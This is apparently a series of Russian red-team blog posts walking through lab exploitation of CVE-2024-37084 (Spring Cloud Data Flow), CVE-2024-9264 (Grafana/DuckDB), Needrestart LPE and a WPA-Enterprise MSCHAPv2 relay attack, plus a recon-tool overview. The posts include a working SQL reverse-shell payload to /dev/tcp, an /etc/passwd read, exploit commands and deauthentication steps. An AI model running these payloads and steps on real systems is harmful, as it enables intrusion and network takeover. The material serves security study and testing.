Подтверждает, что процесс распаковки прошел успешно и распакованный файл существует.

Чтение и проверка метаданных пакета

Package packageToUpload = this.packageReader.read(unpackagedFile);
PackageMetadata packageMetadata = packageToUpload.getMetadata();
if (!packageMetadata.getName().equals(uploadRequest.getName()) || !packageMetadata.getVersion().equals(uploadRequest.getVersion())) {
	throw new SkipperException(String.format("Package definition in the request [%s:%s] differs from one inside the package.yml [%s:%s]",
			uploadRequest.getName(), uploadRequest.getVersion(), packageMetadata.getName(), packageMetadata.getVersion()));
}

Проверка, что прочитанные метаданные из пакета были разархивированы, и проведено сравнение с запросом на загрузку данных.

Сохранение метаданных и связывание их с репозиторием

if (localRepositoryToUpload != null) {
	packageMetadata.setRepositoryId(localRepositoryToUpload.getId());
	packageMetadata.setRepositoryName(localRepositoryToUpload.getName());
}
packageMetadata.setPackageFile(new PackageFile((uploadRequest.getPackageFileAsBytes())));
return this.packageMetadataRepository.save(packageMetadata);

Связывает метаданные пакета с репозиторием (если таковые имеются), а затем сохраняет метаданные пакета в базе данных.

Обработка исключения и удаление временного каталога

finally {
	if (packageDirPath != null && !FileSystemUtils.deleteRecursively(packageDirPath.toFile())) {
		logger.warn("Temporary directory can not be deleted: " + packageDirPath);
	}
}

Ранее созданные временные директории будут удалены после завершения процесса.

Если удалить не удается, записываются предупреждения в журнал.

Описание метода read() в файле DefaultPackageReader.java

Проверка и просмотр файлов в директории

Assert.notNull(packageDirectory, "File to load package from can not be null");
try (Stream<Path> paths = Files.walk(Paths.get(packageDirectory.getPath()), 1)) {
    files = paths.map(i -> i.toAbsolutePath().toFile()).collect(Collectors.toList());
}
catch (IOException e) {
    throw new SkipperException("Could not process files in path " + packageDirectory.getPath() + ". " + e.getMessage(), e);
}

Проверяет правильность передачи по директориям. Затем использует Files.walk(), чтобы просмотреть файлы в директории, получает список файлов и сохраняет в files.
Проверяет, что директория не пуста, и обработывает исключение в случае, если не удается прочитать

Обработка каждого файла

for (File file : files) {
    if (file.getName().equalsIgnoreCase("package.yaml") || file.getName().equalsIgnoreCase("package.yml")) {
        pkg.setMetadata(loadPackageMetadata(file)); // note 
        continue;
    }
    if (file.getName().endsWith("manifest.yaml") || file.getName().endsWith("manifest.yml")) {
        fileHolders.add(loadManifestFile(file));
        continue;
    }
    if (file.getName().equalsIgnoreCase("values.yaml") || file.getName().equalsIgnoreCase("values.yml")) {
        pkg.setConfigValues(loadConfigValues(file));
        continue;
    }
    if (file.getAbsoluteFile().isDirectory() && file.getName().equals("templates")) {
        pkg.setTemplates(loadTemplates(file));
        continue;
    }
    if ((file.getName().equalsIgnoreCase("packages") && file.isDirectory())) {
        File[] dependentPackageDirectories = file.listFiles();
        List<Package> dependencies = new ArrayList<>();
        for (File dependentPackageDirectory : dependentPackageDirectories) {
            dependencies.add(read(dependentPackageDirectory));
        }
        pkg.setDependencies(dependencies);
    }
}

Этот цикл просматривает файлы, сортируя их в соответствии с каждым типом, который должен обрабатываться.

Загрузка пакета метаданных

private PackageMetadata loadPackageMetadata(File file) {
    DumperOptions options = new DumperOptions();
    Representer representer = new Representer(options);
    representer.getPropertyUtils().setSkipMissingProperties(true);
    LoaderOptions loaderOptions = new LoaderOptions();
    Yaml yaml = new Yaml(new Constructor(PackageMetadata.class, loaderOptions), representer);
    String fileContents = null;
    try {
        fileContents = FileUtils.readFileToString(file);
    }
    catch (IOException e) {
        throw new SkipperException("Error reading yaml file", e);
    }
    PackageMetadata pkgMetadata = (PackageMetadata) yaml.load(fileContents);
    return pkgMetadata;
}

Эта функция использует библиотеку SnakeYaml для чтения файла YAML и преобразует его в objectPackageMetadata.

Она использует конструктор для отображения свойств файла YAML в object Java.

Загрузка шаблона файла

private List<Template> loadTemplates(File templatePath) {
    try (Stream<Path> paths = Files.walk(Paths.get(templatePath.getAbsolutePath()), 1)) {
        files = paths.map(i -> i.toAbsolutePath().toFile()).collect(Collectors.toList());
    }
    catch (IOException e) {
        throw new SkipperException("Could not process files in template path " + templatePath, e);
    }

    List<Template> templates = new ArrayList<>();
    for (File file : files) {
        if (isYamlFile(file)) {
            Template template = new Template();
            template.setName(file.getName());
            try {
                template.setData(new String(Files.readAllBytes(file.toPath()), "UTF-8"));
            }
            catch (IOException e) {
                throw new SkipperException("Could read template file " + file.getAbsoluteFile(), e);
            }
            templates.add(template);
        }
    }
    return templates;
}

Эта функция переходит в папку "шаблоны", считывает каждый файл YAML и преобразует в object Template.

Она загружает содержимое файла и сохраняет в шаблоне для последующего использования.

Загрузка значений конфигурации

private ConfigValues loadConfigValues(File file) {
    ConfigValues configValues = new ConfigValues();
    try {
        configValues.setRaw(new String(Files.readAllBytes(file.toPath()), "UTF-8"));
    }
    catch (IOException e) {
        throw new SkipperException("Could read values file " + file.getAbsoluteFile(), e);
    }
    return configValues;
}

Считывает значения файла.yaml или values.yml и сохраняет его содержимое в объекте ConfigValues.

Загрузка packageMetadata

private PackageMetadata loadPackageMetadata(File file) {
		// The Representer will not try to set the value in the YAML on the
		// Java object if it isn't present on the object
		DumperOptions options = new DumperOptions();
		Representer representer = new Representer(options);
		representer.getPropertyUtils().setSkipMissingProperties(true);
		LoaderOptions loaderOptions = new LoaderOptions();
		Yaml yaml = new Yaml(new Constructor(PackageMetadata.class, loaderOptions), representer);
		String fileContents = null;
		try {
			fileContents = FileUtils.readFileToString(file);
		}
		catch (IOException e) {
			throw new SkipperException("Error reading yaml file", e);
		}
		PackageMetadata pkgMetadata = (PackageMetadata) yaml.load(fileContents);
		return pkgMetadata;
	}
	PackageMetadata pkgMetadata = (PackageMetadata) yaml.load(fileContents);

Содержимое строки YAML (FileContents) преобразуется в объект PackageMetadata с помощью yaml.load(FileContents) из библиотеки SnakeYaml.

Десериализация: Когда SnakeYaml встречает тег !!javax.script.ScriptEngineManager создает объект класса Java.

Это может привести к выполнению кода Java.

Реализация уязвимости

Готовое решение для генерации полезной нагрузки можно скачать из github репозитория:

https://github.com/Ly4j/CVE-2024-37084-Exp

Меняем содержимое функции Runtime.getRunrime().exec() в файле src/rtsploit/AwesomeScriptEngineFactory.java.

Поднимаем слушателя на указанный в нагрузке порт:

Запускаем generate-yaml-payload.jar.py, чтобы создать файл yaml-payload.jar командой:

python generate-yaml-payload.jar.py

Поднимаем веб-сервис с помощью Python командой:

python3 -m http.server 8080

Каждый раз, когда вы выполняете другую команду, вам нужно переименовывать файл yaml-payload.jar, то есть файл xx.jar, к которому вы обращаетесь, каждый раз под другим именем.

В противном случае новая команда не будет действовать.

Эксплуатируем:

cve-2024-37084-exp.py -u http://localhost:7577 -payload http://ip-address:port/yaml-payload.jar

Заключение

В версиях Spring Cloud Data Flow до 2.11.4 злоумышленник, имеющий доступ к API-интерфейсу сервера Skipper, может использовать специально созданный запрос на загрузку для записи произвольного файла в любое место в файловой системе, что может привести к выполнению произвольного кода на стороне сервера.

Чтобы исправить уязвимость CVE-2024-37084 в Spring Cloud Data Flow, рекомендуется обновить версию до 2.11.4 или выше.

Уязвимость CVE-2024-9264: Удаленное выполнение кода в Grafana через SQL-выражения

2024-12-03T10:53:53.626Z

Введение

Grafana – это популярная платформа для мониторинга и визуализации данных,
которая широко используется в IT-среде для создания интерактивных панелей
управления и графиков на основе различных источников данных. Она поддерживает интеграцию с множеством баз данных и сервисов, включая Prometheus, InfluxDB, Graphite, MySQL, PostgreSQL и другие.

Благодаря своей гибкости и удобству использования, Grafana стала стандартным инструментом для многих компаний, работающих с большими объемами данных. Grafana предоставляет мощные инструменты для анализа метрик и логов, позволяя пользователям создавать настраиваемые дашборды, отслеживать производительность приложений и инфраструктуры, а также получать уведомления о критических событиях.

DuckDB – это встроенная база данных, ориентированная на работу с аналитическими запросами и обработку больших объемов данных. Это легковесная реляционная система управления базами данных (СУБД), разработанная для встраивания в приложения и работы непосредственно в оперативной памяти. DuckDB поддерживает SQL-запросы и оптимизирован для быстрого выполнения сложных аналитических запросов.

Одной из ключевых особенностей DuckDB является её способность работать внутри других приложений, таких как Grafana, обеспечивая высокую скорость обработки данных и минимальные требования к ресурсам. Однако, как и любое программное обеспечение, они не застрахованы от уязвимостей, одна из которых будет рассмотрена далее.

Данная статья представлена исключительно в образовательных целях. Red Team сообщество "GISCYBERTEAM" не несёт ответственности за любые последствия ее использования третьими лицами.

Описание уязвимости

Уязвимость CVE-2024-9264 представляет собой критический баг в системе мониторинга и визуализации данных Grafana, связанный с недостаточной фильтрацией входных данных в экспериментальной функции SQL-выражений.

Данная уязвимость позволяет любым аутентифицированным пользователям выполнять произвольные SQL-запросы в базе данных DuckDB, что открывает возможности для проведения SQL-инъекций.

Злоумышленники могут использовать эту уязвимость для LFI (чтения файлов на сервера) или даже RCE (выполнения произвольного кода на сервера). Уязвимость имеет оценку в 9.4 баллов по CVSS.

SQL-инъекция — это тип уязвимости в веб-приложениях, позволяющий злоумышленникам вставлять произвольные SQL -запросы в поля ввода, что может привести к несанкционированному доступу к данным, их изменению или удалению.

LFI (Local File Inclusion) – это тип уязвимости в веб-приложениях, позволяющий злоумышленникам включать локальные файлы на сервере в ответ на запрос пользователя. Это может привести к раскрытию конфиденциальной информации, такой как пароли или исходный код приложения.

RCE (Remote Code Execution) – это тип уязвимости в веб-приложениях, позволяющий злоумышленникам выполнять произвольный код на удаленном сервере. Это одна из самых опасных уязвимостей, так как она дает полный контроль над системой.

Подготовка стендового окружения

Сначала создадим файл Dockerfile . Этот файл будет использоваться для построения Docker-образа, который включает в себя Grafana и DuckDB.

Так как CVE-2024-9264 подвержены версии Grafana OSS и Enterprise 11.0.0 — 11.0.5, 11.1.0 — 11.1.6 и 11.2.0 — 11.2.1, будем использовать grafana 11.0.0.

Для работы этой уязвимости двоичный файл DuckDB должен присутствовать в
$PATH Grafana. По умолчанию этот двоичный файл не устанавливается в дистрибутивах Grafana, поэтом при подготовки стенда мы дополним Dockerfile
установкой DuckDB: https://github.com/duckdb/duckdb/releases/download/v1.1.2/duckdb_cli-linux-amd64.zip

# Dockerfile
FROM grafana/grafana:11.0.0-ubuntu

USER root

# Установка DuckDB
RUN apt-get update && apt-get install -y && apt-get install unzip -
y \
   wget \
   && wget
https://github.com/duckdb/duckdb/releases/download/v1.1.2/duckdb_cl
i-linux-amd64.zip \
   && unzip duckdb_cli-linux-amd64.zip -d /usr/local/bin/ \
   && chmod +x /usr/local/bin/duckdb \
   && rm duckdb_cli-linux-amd64.zip
   
# Добавление DuckDB в PATH
ENV PATH="/usr/local/bin:${PATH}"

Соберем Dockerfile в новый образ:

docker build -t test-cve-grafana-duckdb .

Эта команда создаст новый Docker-образ с именем test-cve-grafana- duckdb.

Запустим созданный Docker-образ:

sudo docker run --name=grafana -p 3000:3000 test-cve-grafana-
duckdb

Создание пользователя

После запуска Docker-образа перейдем по http://localhost:3000 и авторизуемся со стандартным логином и паролем admin:admin , после чего создадим нового пользователя с минимальной ролью viewer (только на просмотр)

Разбор уязвимости

Уязвимым является запрос POST к /api/ds/query в Grafana, который предназначен для выполнения запросов к источникам данных (Data Sources) для сохранения или обновления панели управления. С помощью этого API пользователи могут отправлять запросы к различным подключенным базам данных или другим источникам данных, настроенным в Grafana, и получать результаты этих запросов.

Схема тела JSON:

queries: массив объектов, каждый из которых описывает отдельный запрос кисточнику данных.

refId: Уникальный идентификатор запроса. В данном случае "GIS", но может быть любым.
datasource: Информация об источнике данных, к которому отправляется запрос.

type: Тип источника данных. Здесь указан "GIS".
uid: Уникальный идентификатор источника данных. "__expr__", что указывает на использование экспериментальных выражений.
name: Имя источника данных. Указано как "GIS" .

type: Тип запроса. В данном случае "sql" , что указывает на SQL- запрос.
hide: Флаг, определяющий, следует ли скрывать результат запроса. Установлен в false .
expression: Само SQL-выражение, которое должно быть выполнено. В данном случае это "SELECT content FROM read_blob(\"/etc/passwd\")", что пытается прочитать содержимое файла /etc/passwd .

{
   "queries": [
      {
        "refId": "GIS",
        "datasource": {
        "type": "GIS",
        "uid": "__expr__",
        "name": "GIS"
      },
      "type": "sql",
      "hide": false,
      "expression": "SELECT content FROM read_blob(\"/etc/passwd\")", "window": ""
   }
   ],
   "from": "1729313027261",
   "to": "1729334627261"
}

Также, уязвимость CVE-2024-9264 позволяет получить обратную оболочку.

PoC:

"SELECT 1;COPY (SELECT 'sh -i >& /dev/tcp/192.168.0.111/4444 0>&1') TO '/tmp/rev'; SELECT 1;install shellfs from community; LOAD shellfs;SELECT * FROM read_csv('bash /tmp/rev |');"

У себя в терминале подняли слушатель на 4444 порту.

rlwrap nc -lvnp 4444

Отправили запрос к api и получили обратное соединение.

Этот SQL-запрос представляет собой получение обратной оболочки через базу данных:

SELECT 1; – просто возвращает значение 1 , чтобы начать выполнение.
COPY (SELECT 'sh -i >& /dev/tcp/192.168.0.111/4444 0>&1') TO '/tmp/rev';

Создает файл /tmp/rev с содержимым команды для обратного шелла, которая будет пытаться установить соединение с IP-адресом 192.168.0.111 на порту 4444.

SELECT 1; – снова возвращает 1.
install shellfs from community; LOAD shellfs;

Устанавливает и загружает расширение базы данных под названием shellfs . Это расширение позволяет выполнять системные команды непосредственно из SQL-запросов.

SELECT * FROM read_csv('bash /tmp/rev |');

Выполняет команду bash /tmp/rev , которая запускает созданный ранее скрипт для установления обратного соединения с удаленным сервером.

Заключение

Уязвимость CVE-2024-9264 возникает из-за недостаточного контроля над тем, какие SQL-запросы могут быть выполнены через экспериментальную функцию SQL-выражений в Grafana.

Экспериментальная функция позволяет пользователям вводить произвольные SQL-запросы, которые затем выполняются базой данных DuckDB.

При отсутствии должной фильтрации и экранирования вводимых данных злоумышленник может внедрить вредоносные SQL-команды, что приведет к выполнению недопустимых действий на сервере.

Linux LPE через Needrestart (CVE-2024-48990)

2024-12-02T12:29:50.499Z

Введение

19 ноября 2024 года компания Qualys публично раскрыла информацию о пяти уязвимостях в утилите Needrestart. Эти уязвимости касаются локальной эскалации привилегий(LPE) и были найдены в бинарном файле. CVE-2024-48990 затрагивает версии Needrestart до 3.8. В Ubuntu она применяется по умолчанию с версии 21.04. Также проблема актуальна для Debian, Fedora и других дистрибутивов Linux.

LPE (Local Privilege Escalation) позволяет злоумышленнику повысить свои привилегии в системе, получив доступ к действиям, доступным только администраторам (например, root-доступ). Это может использоваться для установки вредоносного ПО, управления системой, обхода ограничений безопасности и доступа к конфиденциальным данным. Основная цель — получить полный контроль над системой.

Уязвимость имеет оценку в 7.8 баллов по CVSS.

Данная статья представлена исключительно в образовательных целях. Red Team сообщество "GISCYBERTEAM" не несёт ответственности за любые последствия ее использования третьими лицами.

Что такое Needrestart

Needrestart — это утилита для Linux, которая проверяет, какие службы или процессы нужно перезапустить после обновления системных библиотек. Она помогает гарантировать, что обновления безопасности применяются ко всем запущенным процессам, минимизируя риски использования устаревших библиотек. Утилита особенно полезна для серверов, где важно поддерживать актуальное состояние сервисов без полного перезагрузки системы.

Разбор уязвимости

LPE (Local Privilege Escalation) — это тип атаки, при котором злоумышленник использует уязвимость или неправильную конфигурацию системы, чтобы повысить свои права с обычного пользователя до администратора (например, root-доступ в Linux). Это дает возможность выполнять критически важные команды, изменять системные настройки, получать доступ к защищенным данным и устанавливать вредоносное ПО. LPE часто используется в связке с другими методами атак для усиления их эффективности или распространения угрозы на другие устройства.

CVE-2024-48990 возникает из-за уязвимости в обработке переменных окружения утилитой Needrestart, используемой в Linux для проверки и перезапуска сервисов после обновления библиотек. Проблема связана с тем, что утилита до версии 3.8 некорректно обрабатывает переменную PYTHONPATH. Это позволяет локальному атакующему указать поддельный путь для Python-интерпретатора, что может привести к выполнению произвольного кода с привилегиями root.

Ошибка стала возможной из-за недостаточного контроля содержимого переменных окружения, используемых для настройки путей загрузки модулей интерпретаторов (Python, Perl, Ruby). Это делает утилиту уязвимой к манипуляциям со стороны локальных пользователей, которые могут подменить пути на вредоносные библиотеки или скрипты.

Чтобы проверить уязвима ли ваша система можно выполнить команду:

needrestart --version | grep -q "3.7" && echo "Definitely vulnerable" || echo "Version is potentially not vulnerable, this simply checks for 3.7"

Для демонстрации эксплуатации воспользуемся публичным эксплойтом:

git clone https://github.com/pentestfunctions/CVE-2024-48990-PoC-Testing.git

Получив первоначальный доступ к системе от обычного пользователя запустим скрипт для прослушивания:

cd CVE-2024-48990-PoC-Testing
./runner.sh

Чтобы уязвимость отработала необходимо подождать, пока другой пользователь в системе выполнит обновление или что-то, что вызовет необходимость использования утилиты Needrestart, в нашем случае мы устанавливаем пакет ntp, что автоматически ее запускает:

sudo apt remove ntp; sudo apt install ntp

Получаем доступ к root-пользователю:

Получаем root-флаг:

Заключение

В заключение, CVE-2024-48990 демонстрирует, как эксплуатация уязвимости в системной утилите может привести к серьезным последствиям, таким как получение прав root и доступ к конфиденциальным данным.

Инцидент служит напоминанием о необходимости регулярного обновления ПО, тщательной настройки переменных окружения и использования дополнительных защитных механизмов.

Argus - мощный инструмент для разведки

2024-11-12T08:30:02.759Z

Введение

Argus — это универсальный инструмент на Python, созданный для упрощения процесса сбора информации и проведения разведки. Благодаря удобному интерфейсу и набору мощных модулей, Argus позволяет эффективно и результативно исследовать сети, веб-приложения и настройки безопасности. Независимо от того, проводите ли вы исследование, выполняете оценку безопасности с надлежащим разрешением или просто интересуетесь сетевыми инфраструктурами, Argus предоставляет вам широкий спектр данных — всё в одном месте.

Данная статья представлена исключительно в образовательных целях. Red Team сообщество "GISCYBERTEAM" не несёт ответственности за любые последствия ее использования третьими лицами.

Установка

git clone https://github.com/jasonxtn/argus.git
cd argus
pip install -r requirements.txt

После установки Argus можно запустить с помощью:

python argus.py

Как и для чего можно использовать

Argus предлагает широкий набор инструментов, разделённых на три основные категории:

Инструменты для работы с сетью и инфраструктурой

Эти инструменты помогают собирать данные о сети, раскрывая важные детали о серверах, IP-адресах, DNS-записях и многом другом:

Связанные хосты: Найдите домены, связанные с целью.
DNS через HTTPS: Безопасное разрешение DNS через зашифрованные каналы.
DNS-записи: Сбор записей DNS, включая A, AAAA, MX и другие.
Проверка DNSSEC: Проверка правильности настройки DNSSEC.
Информация о домене: Сбор данных, таких как регистрационные детали и даты истечения домена.
Проверка репутации домена: Оценка надежности домена по различным источникам репутации.
Информация об IP: Получение географических данных и информации о владельце IP-адреса.
Сканирование открытых портов: Проверка целевого ресурса на открытые порты и сервисы.
Информация о сервере: Извлечение ключевых данных о сервере с использованием различных методов.
Расположение сервера: Определение физического местоположения сервера.
Анализ цепочки SSL: Проверка цепочки сертификатов SSL на надежность.
Уведомление об истечении SSL: Проверка сертификатов SSL на приближающееся истечение.
Поддерживаемые шифры TLS: Список поддерживаемых сервером шифров TLS.
Симуляция TLS-хэндшейка: Имитация хэндшейка TLS для выявления уязвимостей.
Трассировка маршрута (Traceroute): Трассировка пути передачи пакетов до цели.
TXT-записи: Получение TXT-записей, часто используемых для проверки.
WHOIS-запрос: Выполнение WHOIS-запросов для сбора данных о владельце домена.
Перенос зоны (Zone Transfer): Попытка переноса DNS-зоны.
Поддержка HTTP/2 и HTTP/3: Проверка поддержки сервером HTTP/2 и HTTP/3.

Инструменты анализа веб-приложений

Эти модули направлены на изучение структуры и безопасности веб-приложений:

История архива: Просмотр истории цели с использованием интернет-архивов.
Обнаружение неработающих ссылок: Поиск неработающих ссылок, которые могут вызывать неудобства или уязвимости.
Углеродный след: Оценка экологического воздействия сайта.
Обнаружение CMS: Определение типа CMS, например WordPress, Joomla и т.д.
Анализ cookies: Анализ cookies на предмет безопасности и конфиденциальности.
Обнаружение контента: Поиск скрытых директорий, файлов и конечных точек.
Сканер сайта: Сканирование сайта для выявления данных и построения его структуры.
Анализ robots.txt: Проверка файла robots.txt на скрытые ресурсы.
Поиск директорий: Поиск директорий, которые могут не индексироваться публично.
Сбор email-адресов: Извлечение адресов электронной почты с домена цели.
Мониторинг производительности: Оценка времени отклика и производительности сайта.
Метрики качества: Оценка качества контента и пользовательского опыта.
Анализ цепочки редиректов: Проверка перенаправлений на предмет безопасности или вредоносности.
Парсинг карты сайта: Извлечение URL-адресов из карты сайта.
Анализ соцсетей: Сканирование присутствия цели в социальных сетях.
Обнаружение технологического стека: Определение технологий и фреймворков, используемых на сайте.
Интеграции с третьими сторонами: Обнаружение подключённых сторонних сервисов.

Инструменты безопасности и разведки угроз

Эти модули в Argus направлены на оценку защитных мер цели и сбор разведданных о потенциальных угрозах:

Разведка с помощью Censys: Использование Censys для получения подробных данных об активах цели.
Информация о центре сертификации: Проверка данных о центре сертификации.
Обнаружение утечек данных: Проверка на возможные утечки и утечку конфиденциальных данных.
Проверка файлов окружения: Обнаружение публично доступных файлов .env.
Обнаружение фаервола: Определение наличия фаервола или WAF на цели.
Мировой рейтинг: Проверка мирового рейтинга сайта для оценки его популярности.
HTTP-заголовки: Извлечение и анализ HTTP-заголовков ответа.
Функции безопасности HTTP: Проверка заголовков безопасности, таких как HSTS, CSP и др.
Проверка на вредоносное ПО и фишинг: Сканирование сайта на предмет вредоносного ПО и фишинговых рисков.
Мониторинг Pastebin: Поиск на сайтах с утечками, связанными с целью.
Проверка на соответствие GDPR: Проверка соответствия GDPR и другим нормативам конфиденциальности.
Проверка security.txt: Анализ файла security.txt для получения политики раскрытия уязвимостей.
Разведка с помощью Shodan: Использование Shodan для обнаружения открытых портов, сервисов и уязвимостей.
Отчёт SSL Labs: Получение детализированной оценки SSL/TLS с помощью SSL Labs.
Проверка пиннинга SSL: Проверка реализации SSL-пиннинга на сайте.
Перечень поддоменов: Обнаружение поддоменов целевого домена.
Уязвимость захвата поддоменов: Тестирование поддоменов на уязвимость к захвату.
Сканирование VirusTotal: Проверка репутации цели с помощью VirusTotal.

Как использовать Argus

Запустите Argus через командную строку.
Выберите номер инструмента из главного меню.
Следуйте подсказкам для ввода необходимых данных.
Изучите результаты и при необходимости скорректируйте стратегию.

Демонстрация применения

Запустим Argus на сбор электронных почт:

Программа вывела нам следующее:

Использование Argus для получения информации о сервере:

Продемонстриурем обнаружение заголовков безопасности HTTP:

Работа модуля Archive History:

Работа модуля Sitemap Parsing:

Если необходимо выявить присутствие цели в социальных сетях, то можно использовать модуль Social Media Presence Scan:

Работа модуля Pastebin Monitoring:

С помощью Argus’a можно проверить ресурс на возможные утечки данных:

Инструмент можно использовать также для обнаружения поддоменов:

Заключение

В заключение, Argus представляет собой мощный и универсальный инструмент для специалистов в области информационной безопасности и анализа инфраструктуры. Сочетая в себе простоту использования и богатый функционал, Argus существенно упрощает задачи по сбору данных, анализу безопасности и оценке структуры сетей и веб-приложений.

С Argus пользователи получают возможность работать с обширным спектром данных в одном месте, что делает процесс оценки безопасности более оперативным и удобным. При соблюдении этических норм и получении соответствующих разрешений, Argus становится незаменимым помощником для тех, кто стремится к глубокому пониманию безопасности и устойчивости сетевых ресурсов.

Часть 3. Тестируем безопасность WPA-Enterprise: EAP (MSCHAPv2) Relay attack

2024-10-16T14:39:12.879Z

Введение

В прошлой статье по WPA-Enterprise мы рассмотрели атаку Downgrade и в последнем примере смогли получить лишь хэш пароля. Предположим, что парольная политика тестируемой организации на высоком уровне, а это значит, что брут хэша займет неоправданно много времени и может вовсе не увенчаться успехом. Это конец? На самом деле нет, если в сетях WPA-Enterprise организации для аутентификации клиента используется метод MSCHAPv2 (что является очень частой ситуацией). В этом случае мы можем попробовать провести ретрансляционную атаку.

Данная статья представлена исключительно в образовательных целях. Red Team сообщество "GISCYBERTEAM" не несёт ответственности за любые последствия ее использования третьими лицами.

Чуть-чуть теории

В целом, ретрансляционная атака — это когда вы выступаете посредником в попытке аутентификации (обычно запрос-ответ NetNTLM) между двумя сторонами. Сделав это, вы можете перехватить полученную успешную аутентификацию и получить привилегированный доступ к чему-либо.

Однако мы собираемся провести ее с помощью MSCHAPv2 и Wi-Fi вместо NTLM и TCP/IP.

Суть EAP (MSCHAPv2) Relay атаки заключается в том, что злоумышленник перехватывает challenge-response (вызов-ответ) клиента к оригинальной точке доступа и затем передает ответ серверу аутентификации от имени аутентифицирующего пользователя. Сервер не видит разницы между законным клиентом и клиентом злоумышленника. После проверки данных сервер отправляет разрешение на подключение, которое снова получает злоумышленник вместо легитимного пользователя и по итогу получает доступ к корпоративной сети.

Подготовка к атаке

Есть несколько предварительных условий для выполнения ретрансляционной атаки. Сначала нам нужно иметь возможность заставить жертву аутентифицироваться на нашем устройстве, а не на легитимном. В мире NTLM для этого используется Responder, который отвечает Windows запросами LLMNR, утверждающими, что они идут от легитимного сервера. Этот обманчивый ответ аналогичен тому, что делает hostapd-mana (далее – просто mana, ссылка: https://github.com/sensepost/hostapd-mana), за исключением того, что в пространстве Wi-Fi устройства-жертвы проверяют сети, отправляя зонды, а mana принимает эти зонды и сообщает устройствам, что это именно та точка доступа, которую они ищут, после чего устройства попытаются пройти аутентификацию на хосте с запущенной mana.

Второй этап ретрансляционной атаки — это собственно ретрансляция. Это означает попытку аутентификации, которая предпринимается на нашей мошеннической точки доступа, и передачу ее туда, где вы действительно хотите пройти аутентификацию. Для этого мы будем использовать утилиту wpa_sycophant (далее – просто sycophant, ссылка: https://github.com/sensepost/wpa_sycophant). Sycophant и mana синхронизируют состояние и передают информацию между собой с помощью файлов. После запуска sycophant будет ждать, пока жертва начнет аутентифицироваться на хосте с запущенной mana. После того, как жертва связалась с mana и прошла внешнюю аутентификацию (т. е. TLS-часть PEAP), sycophant связывается с законной точкой доступа, согласовывает внешнюю аутентификацию, затем извлекает информацию из mana и дословно передает ее точке доступа для внутренней аутентификации. Если все это работает, законный RADIUS-сервер возвращает успешную аутентификацию и позволяет sycophant связаться с целевой легитимной точкой доступа.

Также для данной атаки потребуется как минимум 2 беспроводных интерфейса (причем физических), а лучше 3:

1-й для несанкционированной точки доступа и работы mana;
2-й для настройки sycophant;
3-й для мониторинга и отправки пакетов деаутентификации. 3-им интерфейсом можно пренебречь и выполнить мониторинг перед основной атакой, но тогда вы не сможете проводить деаутентификацию клиентов и придется ждать их повторного подключения без вашего участия.

Практика

Итак, мы установили необходимые инструменты и раздобыли 3 сетевых интерфейса: 1 встроенный в ноутбук и 2 за счет внешних Wi-Fi-адаптеров.

Распределим интерфейсы следующим образом:

wlan0 для mana;
wlan1 для sycophant;
wlan2 для мониторинга и деаутентификации клиентов.

Процесс организации атаки выглядит следующим образом:

Установка беспроводной сетевой карты в режим мониторинга.
Идентификация цели — сканирование сети и поиск клиентов, использующих целевую сеть.
Создание поддельной точки доступа и запуск mana.
Запуск sycophant для проведения ретрансляции.
[Опционально] деаутентификация клиента от легитимной точки доступа.

Итак, устанавливаем наш Wi-Fi-адаптер в режим мониторинга:

sudo iw dev wlan2 set monitor none

Запускаем сканирование эфира в поисках интересующей нас сети (в нашем примере это сеть Guest) и нахождения ее точек доступа:

sudo airodump-ng wlan2 --essid Guest

Затем подготавливаем файл ap.conf для mana: указываем essid целевой точки доступа (ssid), канал, на котором будет поднята наша точка доступа (channel), а также указываем выделенный для mana сетевой интерфейс wlan0 (interface). Интерфейс wlan0 должен иметь выход в интернет. Также указываем пути до сертификатов: можно воспользоваться сертификатами, предоставленными самой утилитой. В итоге наш файл ap.conf должен выглядеть примерно так:

Важно: данный файл должен располагаться в каталоге с папкой certs, в которой размещены сертификаты.

Теперь создаем новый файл с тем же именем, что указано в переменной eap_user_file (в нашем случае – это файл hostapd.eap_user), и помещаем его в тот же каталог, что и ap.conf. Благодаря этому любой пользователь теперь может подключиться к нашей фейковой сети.

Файл hostapd.eap_user должен выглядеть так:

Можем запускать mana:

sudo hostapd-mana /etc/hostapd-mana/ap.conf

Далее мы должны настроить файл wpa_sycophant.config в каталоге wpa_sycophant: указать ssid и записать в поле bssid_blacklist mac адрес, который был назначен wlan0 после запуска mana (в нашем случае это 2c:3b:70:84:f4:fe). Это нужно для того, чтобы предотвратить непреднамеренное подключение клиента к созданной нами фейковой точке доступа.

Теперь можем запускать sycophant:

sudo /etc/wpa_sycophant/wpa_sycophant.sh -c wpa_sycophant.config -i wlan1

Примечание: возможно для работы sycophant потребуется установить libssl1.0.0

[Опционально] Клиент должен быть отключен от легитимной сети, чтобы установить соединение с нашей несанкционированной точкой доступа. Это можно сделать, запустив атаку деаутентификации:

aireplay-ng -0 4 -a <target BSSID> -c <target client MAC> wlan2

Атака началась.

Немного подождем и в случае успеха увидим, что клиент отправляет ответ точке доступа в выходных данных mana. Mana, помимо приема данных от клиента, также дает команды для подбора ответа, чтобы получить пароль, но это не сработает, поскольку в данном случае пароль невероятно надежный, и у нас нет для него подходящего вордлиста.

Sycophant берет ответ, идентификацию и другую информацию из каталога /tmp/ (мы оставили этот параметр в файле ap.conf без изменений), отправленную mana (для взаимодействия между процессами через файл), и передает ее в легитимную сеть.

Также sycophant автоматически запрашивает IPv4 для нашей точки доступа.

В результате на интерфейсе wlan1 мы видим подключение к сети Guest.

До атаки:

После атаки:

До атаки:

После атаки:

Таким образом, если вы сможете пройти аутентификацию на сервере RADIUS, вы сможете подключиться к точке доступа и получить доступ к внутренней сети организации.

Давайте убедимся, что мы имеем доступ к «внутрянке» и немного посканим сеть Guest:

Теперь можно приступать к пентесту инфраструктуры. Впрочем, это уже совсем другая история.

Заключение

В данной статье рассмотрены не все аспекты тестирования корпоративных беспроводных статей. Надеюсь, что вы смогли найти для себя что-то новое и интересное и рассмотренный материал поможет вам в вашей работе.

И помните: вся представленная в статье информация приводится исключительно в ознакомительных целях. Перед использованием приведенной информации настоятельно рекомендуется ознакомиться со статьей 272 УК РФ.

GISCYBERTEAM

Похищение данных для подключения к Wi-Fi через Captive Portal

Введение

Установка утилиты для атаки

Создание страницы Captive Portal

Запуск Evil Twin с Captive Portal

Заключение

Remote Code Execution в Widget Options (WordPress Plugin) - CVE-2024-8672

Введение

Подготовка стендового окружения

Установка WordPress

Эксплуатация уязвимости

Причины уязвимости

Заключение

Критическая уязвимость в Wordpress-плагине WP Umbrella (CVE-2024-12209)

Введение

Для чего используется плагин WP Umbrella
